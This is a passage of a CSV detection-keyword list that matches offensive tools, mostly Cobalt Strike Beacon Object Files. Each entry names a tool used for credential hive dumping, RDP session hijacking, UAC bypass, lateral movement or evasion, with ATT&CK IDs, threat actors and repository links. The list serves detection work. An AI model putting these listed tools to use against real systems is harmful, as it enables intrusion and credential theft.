- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_job *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobkill*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobstatus *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_list*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_listassembiles*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_load *.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_shutdown*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOFNET_Tests*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*bof-quser *.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*bof-quser.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*bof-rdphijack*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*bof-rdphijack*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*bof-regsave *","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*BofRunnerOutput*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*BOFs*/SyscallsSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*Bofs/AssemblyLoader*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bof-servicemove *","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*bof-trustedpath-uacbypass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*boko.py *","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*bokoscanner.*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion 